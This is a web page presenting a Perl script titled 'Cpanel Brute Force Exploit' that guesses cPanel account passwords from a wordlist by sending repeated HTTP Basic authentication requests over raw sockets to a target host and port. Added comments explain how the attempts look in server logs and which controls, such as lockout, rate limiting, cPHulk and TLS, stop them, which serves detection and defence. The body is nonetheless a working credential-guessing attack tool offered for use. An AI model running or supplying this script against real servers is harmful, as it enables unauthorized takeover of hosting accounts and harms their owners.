Cpanel Brute Force Exploit

The script is written in Perl.

#!/usr/bin/perl
# Cpanel Password Brute Forcer
# —————————-
# (c)jos_ali_joe
# Perl Version ( low speed )
# Original Advisory :
use IO :: Socket ;
use LWP :: Simple ;
use MIME :: Base64 ;

# Top-level setup: reads five positional arguments, prints a usage banner and
# exits when too few are given, otherwise hands control to headx().
# Arguments in order: target host, account name, port, path to a password
# list, path to an output file.
# NOTE(review): $file is assigned but never referenced in the visible code, so
# the "file for save password" described in the banner is not written here.
$host = $ARGV [ 0 ];
$user = $ARGV [ 1 ];
$port = $ARGV [ 2 ];
$list = $ARGV [ 3 ];
$file = $ARGV [ 4 ];
# The URL uses the http:// scheme; the visible code never reads $url again
# (brut() talks to the host over a raw TCP socket instead).
$url = “http://” . $host . “:” . $port ;
# The banner is shown only when fewer than three arguments are supplied, even
# though the password list is the fourth argument.
if(@ ARGV < 3 ){
print q (
###############################################################
# Cpanel Password Brute Force Tool #
###############################################################
# usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
#————————————————————-#
# [Host] : victim Host (simorgh-ev.com) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#[list] : File Of password list (list.txt) #
# [File] : file for save password (password.txt) #
# #
###############################################################
# (c)jos_ali_joe / Indonesian Coder #
###############################################################
);exit;}

# Runs the whole guessing loop; headx() is defined further down.
headx ();

# NOTE(review): $numstart is set here and not used in the visible code.
$numstart = “-1″ ;

# headx: prints the banner, loads the whole password list into memory and
# calls brut() once for every line of it.
# Reads the global $list; sets the global $passwd before each call to brut().
#
# Defender's view: every line of the list becomes one authentication request
# for the same account, issued back to back with no delay between attempts.
# In access and authentication logs this appears as a burst of failed logins
# for a single user from the machine running the script. Per-account lockout,
# per-source rate limiting and cPanel's cPHulk brute-force protection are the
# controls that cut such a run short.
sub headx () {
print q (
###############################################################
# Cpanel Password Brute Force Tool #
# (c)jos_ali_joe / Indonesian Coder #
###############################################################
);
# Two-argument open with $list interpolated into the mode string; the script
# dies if the list cannot be opened.
open ( PASSFILE , “<$list” ) || die “[-] Can’t open the List of password file !” ;
@ PASSWORDS = < PASSFILE >;
close PASSFILE ;
foreach my $P (@ PASSWORDS ) {
chomp $P ;
$passwd = $P ;
print ”
[~] Try Password : $passwd
” ;
# The candidate is handed over through the global $passwd, not as an argument.
& brut ;
};
}
# brut: tries one candidate password ($passwd) for $user against $host:$port
# using HTTP Basic authentication, and exits the program on the first match.
# Reads the globals $host, $port, $user and $passwd; sets $authx and $answer.
#
# What each attempt looks like from the server side (useful for detection):
#   - a new TCP connection per attempt, carrying a single "GET /";
#   - the request has only Authorization and Connection headers, with no
#     Host and no User-Agent header;
#   - the Authorization value is user:password in Base64, written to a plain
#     TCP socket with no TLS, so the credential is readable on the wire.
# Throttling or lockout on repeated failed Basic-auth logins, and serving the
# panel only over TLS, address both points.
sub brut () {
$authx = encode_base64 ( $user . “:” . $passwd );
# Echoes the encoded credential to standard output.
print $authx ;
# On connection failure only a message is printed; the sub carries on.
my $sock = IO :: Socket :: INET -> new ( Proto => “tcp” , PeerAddr => “$host” , PeerPort => “$port” ) || print ”
[-] Can not connect to the host” ;
print $sock “GET / HTTP/1.1
” ;
print $sock “Authorization: Basic $authx
” ;
print $sock “Connection: Close

” ;
# Only the first 128 bytes of the reply are read.
read $sock , $answer , 128 ;
close ( $sock );

# The reply is searched for the word "Moved"; a match is reported as the
# password and the program exits.
if ( $answer =~ / Moved /) {
print ”
[~] PASSWORD FOUND : $passwd
” ;
exit();
}
}
